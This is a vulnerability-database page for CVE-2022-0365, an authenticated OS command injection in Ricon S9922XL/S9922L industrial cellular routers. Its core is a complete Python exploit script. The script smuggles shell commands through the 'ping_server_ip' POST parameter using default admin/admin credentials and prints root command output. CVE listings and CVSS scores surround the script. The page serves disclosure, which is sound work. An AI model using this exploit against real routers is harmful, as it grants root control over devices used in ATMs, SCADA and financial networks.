Ricon Industrial Cellular Router S9922XL Remote Command Execution

🗓️ 04 Jul 2021 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 457 Views

Ricon Industrial Cellular Router S9922XL Remote Command Execution vulnerability in 16.10.3 firmware allows authenticated OS command injection via 'ping_server_ip' parameter

Reporter	Title	Published	Views	Family All 12
BDU FSTEC	The vulnerability of the microprogrammed software of the Ricon Mobile S9922XL and S9922L routers exists due to the failure to take measures to neutralize special elements used in the operating system’s command set. This vulnerability allows a perpetrator to execute arbitrary commands with root privileges.	12 Dec 202200:00	–	bdu_fstec
Circl	CVE-2022-0365	16 Apr 202516:56	–	circl
CNNVD	Ricon Industrial Cellular Router S9922L 操作系统命令注入漏洞	1 Feb 202200:00	–	cnnvd
CNVD	Ricon Mobile Ricon Industrial Cellular Router S9922L and S9922XL OS Command Injection Vulnerability	10 Feb 202200:00	–	cnvd
CVE	CVE-2022-0365	4 Feb 202222:29	–	cve
Cvelist	CVE-2022-0365 Ricon Mobile, Inc.	4 Feb 202222:29	–	cvelist
EUVD	EUVD-2022-15520	3 Oct 202520:07	–	euvd
ICS	Ricon Mobile Industrial Cellular Router	1 Feb 202200:00	–	ics
NVD	CVE-2022-0365	4 Feb 202223:15	–	nvd
OSV	CVE-2022-0365	4 Feb 202223:15	–	osv

<html><body><p>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
#                   Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\&gt;python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
#            WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#

import requests,sys,re

if len(sys.argv)&lt;3:
    print("Ricon Industrial Routers RCE")
    print("Usage: ./ricon.py [ip] [cmd]")
    sys.exit(17)
else:
    ipaddr=sys.argv[1]
    execmd=sys.argv[2]

data={'submit_class'  :'admin',
      'submit_button' :'netTest',
      'submit_type'   :'',
      'action'        :'Apply',
      'change_action' :'',
      'is_ping'       :'0',
      'ping_server_ip':';'+execmd}

htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\"&gt;(.*)",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
</p></body></html>

04 Jul 2021 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 3.19.1 - 9.8

CVSS 210

EPSS0.02182

SSVC